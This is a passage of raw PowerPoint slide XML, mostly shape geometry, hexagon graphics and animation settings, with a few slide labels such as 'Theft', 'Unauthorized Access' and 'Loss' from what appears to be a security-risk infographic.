                    <a:pt x="4662" y="4520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="4489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="4416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4646" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4620" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4620" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4594" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4562" y="4284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4531" y="4279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4494" y="4274"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5066" y="2452"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3927" y="2452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="2452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="2457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="2473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="2473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3859" y="2494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3854" y="2525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3854" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3854" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3859" y="4122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="4158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5093" y="4158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5119" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5119" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5134" y="4122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5140" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5140" y="2525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5140" y="2525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5134" y="2494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5119" y="2473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5119" y="2473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5093" y="2457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="2452"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1355" y="4998"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5208" y="6200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5208" y="6200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5224" y="6090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5240" y="5985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5261" y="5880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5281" y="5775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5313" y="5675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5350" y="5571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5387" y="5476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5428" y="5381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5476" y="5287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5528" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5581" y="5104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5638" y="5019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5701" y="4935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5765" y="4857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5833" y="4778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5906" y="4704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980" y="4631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6059" y="4563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6137" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6221" y="4436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6306" y="4379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6394" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6489" y="4274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6583" y="4226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6678" y="4185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6773" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6877" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7082" y="4059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7187" y="4038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7292" y="4022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7402" y="4006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7402" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7402" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7124" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6851" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6583" y="79"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6316" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6053" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5796" y="257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5544" y="336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5292" y="425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5050" y="525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4809" y="635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578" y="756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4352" y="882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4127" y="1019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="1166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3701" y="1323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3502" y="1486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="1654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="1833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2935" y="2016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2762" y="2211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2594" y="2410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2436" y="2620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2289" y="2830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147" y="3050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2011" y="3277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890" y="3507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1774" y="3744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1670" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1575" y="4232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1491" y="4484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1417" y="4741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355" y="4998"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="200" y="6001"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="200" y="5198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903" y="5602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="6001"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5355" y="4452"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5355" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5350" y="4510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5334" y="4563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5308" y="4610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5271" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5271" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5224" y="4689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5177" y="4715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5124" y="4730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="4736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="4736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="4736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="4730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3817" y="4715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3770" y="4689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3685" y="4610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3659" y="4563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3644" y="4510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3644" y="2111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3659" y="2058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3685" y="2011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="1964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="1964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3770" y="1927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3817" y="1901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="1885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5124" y="1885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5177" y="1901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5224" y="1927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5271" y="1964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5271" y="1964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5308" y="2011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5334" y="2058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5350" y="2111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5355" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5355" y="445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56" name="Hexagon 288"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4771594" y="3035771"/>
            <a:ext cx="1499489" cy="1295400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1502664"/>
              <a:gd name="connsiteY0" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX1" fmla="*/ 323850 w 1502664"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1295400"/>
              <a:gd name="connsiteX2" fmla="*/ 1178814 w 1502664"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1295400"/>
              <a:gd name="connsiteX3" fmla="*/ 1502664 w 1502664"/>
              <a:gd name="connsiteY3" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX4" fmla="*/ 1178814 w 1502664"/>
              <a:gd name="connsiteY4" fmla="*/ 1295400 h 1295400"/>
              <a:gd name="connsiteX5" fmla="*/ 323850 w 1502664"/>
              <a:gd name="connsiteY5" fmla="*/ 1295400 h 1295400"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 1502664"/>
              <a:gd name="connsiteY6" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1499489"/>
              <a:gd name="connsiteY0" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX1" fmla="*/ 320675 w 1499489"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1295400"/>
              <a:gd name="connsiteX2" fmla="*/ 1175639 w 1499489"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1295400"/>
              <a:gd name="connsiteX3" fmla="*/ 1499489 w 1499489"/>
              <a:gd name="connsiteY3" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX4" fmla="*/ 1175639 w 1499489"/>
              <a:gd name="connsiteY4" fmla="*/ 1295400 h 1295400"/>
              <a:gd name="connsiteX5" fmla="*/ 320675 w 1499489"/>
              <a:gd name="connsiteY5" fmla="*/ 1295400 h 1295400"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 1499489"/>
              <a:gd name="connsiteY6" fmla="*/ 64770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99489" h="1295400">
                <a:moveTo>
                  <a:pt x="0" y="647700"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="320675" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1175639" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1499489" y="647700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1175639" y="1295400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="320675" y="1295400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="647700"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:alpha val="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0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Hexagon 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4062843" y="4304182"/>
            <a:ext cx="1502664" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent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0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Hexagon 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3356370" y="3034182"/>
            <a:ext cx="1502664" cy="1295400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vert270" lIns="0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular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863104" y="4340381"/>
            <a:ext cx="129540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endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular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3460002" y="3568053"/>
            <a:ext cx="1295400" cy="2308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500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Theft</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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4166475" y="4721049"/>
            <a:ext cx="1295400" cy="46166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500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Unauthorized Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Hexagon 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4062843" y="1764182"/>
            <a:ext cx="1502664" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon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vert270" lIns="0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Hexagon 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2657375" y="1764182"/>
            <a:ext cx="1502664" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:alpha val="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0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular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4166475" y="2296465"/>
            <a:ext cx="1295400" cy="2308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500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Loss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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08144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0"/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5.55556E-6 L -1.02083 -5.55556E-6 " pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="65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60" grpId="0"/>
      <p:bldP spid="63" grpId="0"/>
      <p:bldP spid="63" grpId="1"/>
      <p:bldP spid="64" grpId="0"/>
      <p:bldP spid="64" grpId="1"/>
      <p:bldP spid="66" grpId="0" animBg="1"/>
      <p:bldP spid="66" grpId="1" animBg="1"/>
      <p:bldP spid="67" grpId="0" animBg="1"/>
      <p:bldP spid="67" grpId="1" animBg="1"/>
      <p:bldP spid="68" grpId="0"/>
      <p:bldP spid="68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8431" y="3524861"/>
            <a:ext cx="2629525" cy="5353016"/>
            <a:chOff x="-18431" y="3524861"/>
            <a:chExt cx="2629525" cy="5353016"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="99" name="Group 98"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="615850" y="3672077"/>
              <a:ext cx="1929467" cy="2241124"/>
              <a:chOff x="5754688" y="1204913"/>
              <a:chExt cx="1955800" cy="2271712"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="155" name="Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5754688" y="1204913"/>
                <a:ext cx="222250" cy="284162"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 616"/>
                  <a:gd name="T1" fmla="*/ 640 h 788"/>
                  <a:gd name="T2" fmla="*/ 43 w 616"/>
                  <a:gd name="T3" fmla="*/ 556 h 788"/>
                  <a:gd name="T4" fmla="*/ 69 w 616"/>
                  <a:gd name="T5" fmla="*/ 520 h 788"/>
                  <a:gd name="T6" fmla="*/ 95 w 616"/>
                  <a:gd name="T7" fmla="*/ 488 h 788"/>
                  <a:gd name="T8" fmla="*/ 168 w 616"/>
                  <a:gd name="T9" fmla="*/ 436 h 788"/>
                  <a:gd name="T10" fmla="*/ 211 w 616"/>
                  <a:gd name="T11" fmla="*/ 409 h 788"/>
                  <a:gd name="T12" fmla="*/ 337 w 616"/>
                  <a:gd name="T13" fmla="*/ 352 h 788"/>
                  <a:gd name="T14" fmla="*/ 389 w 616"/>
                  <a:gd name="T15" fmla="*/ 330 h 788"/>
                  <a:gd name="T16" fmla="*/ 421 w 616"/>
                  <a:gd name="T17" fmla="*/ 299 h 788"/>
                  <a:gd name="T18" fmla="*/ 436 w 616"/>
                  <a:gd name="T19" fmla="*/ 283 h 788"/>
                  <a:gd name="T20" fmla="*/ 447 w 616"/>
                  <a:gd name="T21" fmla="*/ 267 h 788"/>
                  <a:gd name="T22" fmla="*/ 462 w 616"/>
                  <a:gd name="T23" fmla="*/ 220 h 788"/>
                  <a:gd name="T24" fmla="*/ 473 w 616"/>
                  <a:gd name="T25" fmla="*/ 163 h 788"/>
                  <a:gd name="T26" fmla="*/ 462 w 616"/>
                  <a:gd name="T27" fmla="*/ 136 h 788"/>
                  <a:gd name="T28" fmla="*/ 441 w 616"/>
                  <a:gd name="T29" fmla="*/ 115 h 788"/>
                  <a:gd name="T30" fmla="*/ 426 w 616"/>
                  <a:gd name="T31" fmla="*/ 110 h 788"/>
                  <a:gd name="T32" fmla="*/ 378 w 616"/>
                  <a:gd name="T33" fmla="*/ 105 h 788"/>
                  <a:gd name="T34" fmla="*/ 363 w 616"/>
                  <a:gd name="T35" fmla="*/ 115 h 788"/>
                  <a:gd name="T36" fmla="*/ 347 w 616"/>
                  <a:gd name="T37" fmla="*/ 126 h 788"/>
                  <a:gd name="T38" fmla="*/ 321 w 616"/>
                  <a:gd name="T39" fmla="*/ 168 h 788"/>
                  <a:gd name="T40" fmla="*/ 300 w 616"/>
                  <a:gd name="T41" fmla="*/ 220 h 788"/>
                  <a:gd name="T42" fmla="*/ 174 w 616"/>
                  <a:gd name="T43" fmla="*/ 147 h 788"/>
                  <a:gd name="T44" fmla="*/ 190 w 616"/>
                  <a:gd name="T45" fmla="*/ 99 h 788"/>
                  <a:gd name="T46" fmla="*/ 242 w 616"/>
                  <a:gd name="T47" fmla="*/ 36 h 788"/>
                  <a:gd name="T48" fmla="*/ 279 w 616"/>
                  <a:gd name="T49" fmla="*/ 16 h 788"/>
                  <a:gd name="T50" fmla="*/ 357 w 616"/>
                  <a:gd name="T51" fmla="*/ 0 h 788"/>
                  <a:gd name="T52" fmla="*/ 457 w 616"/>
                  <a:gd name="T53" fmla="*/ 16 h 788"/>
                  <a:gd name="T54" fmla="*/ 504 w 616"/>
                  <a:gd name="T55" fmla="*/ 36 h 788"/>
                  <a:gd name="T56" fmla="*/ 578 w 616"/>
                  <a:gd name="T57" fmla="*/ 89 h 788"/>
                  <a:gd name="T58" fmla="*/ 599 w 616"/>
                  <a:gd name="T59" fmla="*/ 120 h 788"/>
                  <a:gd name="T60" fmla="*/ 615 w 616"/>
                  <a:gd name="T61" fmla="*/ 194 h 788"/>
                  <a:gd name="T62" fmla="*/ 599 w 616"/>
                  <a:gd name="T63" fmla="*/ 278 h 788"/>
                  <a:gd name="T64" fmla="*/ 588 w 616"/>
                  <a:gd name="T65" fmla="*/ 309 h 788"/>
                  <a:gd name="T66" fmla="*/ 573 w 616"/>
                  <a:gd name="T67" fmla="*/ 341 h 788"/>
                  <a:gd name="T68" fmla="*/ 536 w 616"/>
                  <a:gd name="T69" fmla="*/ 388 h 788"/>
                  <a:gd name="T70" fmla="*/ 515 w 616"/>
                  <a:gd name="T71" fmla="*/ 409 h 788"/>
                  <a:gd name="T72" fmla="*/ 484 w 616"/>
                  <a:gd name="T73" fmla="*/ 430 h 788"/>
                  <a:gd name="T74" fmla="*/ 315 w 616"/>
                  <a:gd name="T75" fmla="*/ 509 h 788"/>
                  <a:gd name="T76" fmla="*/ 274 w 616"/>
                  <a:gd name="T77" fmla="*/ 530 h 788"/>
                  <a:gd name="T78" fmla="*/ 247 w 616"/>
                  <a:gd name="T79" fmla="*/ 546 h 788"/>
                  <a:gd name="T80" fmla="*/ 205 w 616"/>
                  <a:gd name="T81" fmla="*/ 588 h 788"/>
                  <a:gd name="T82" fmla="*/ 431 w 616"/>
                  <a:gd name="T83" fmla="*/ 787 h 7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616" h="788">
                    <a:moveTo>
                      <a:pt x="0" y="640"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="136"/>
                    </a:lnTo>
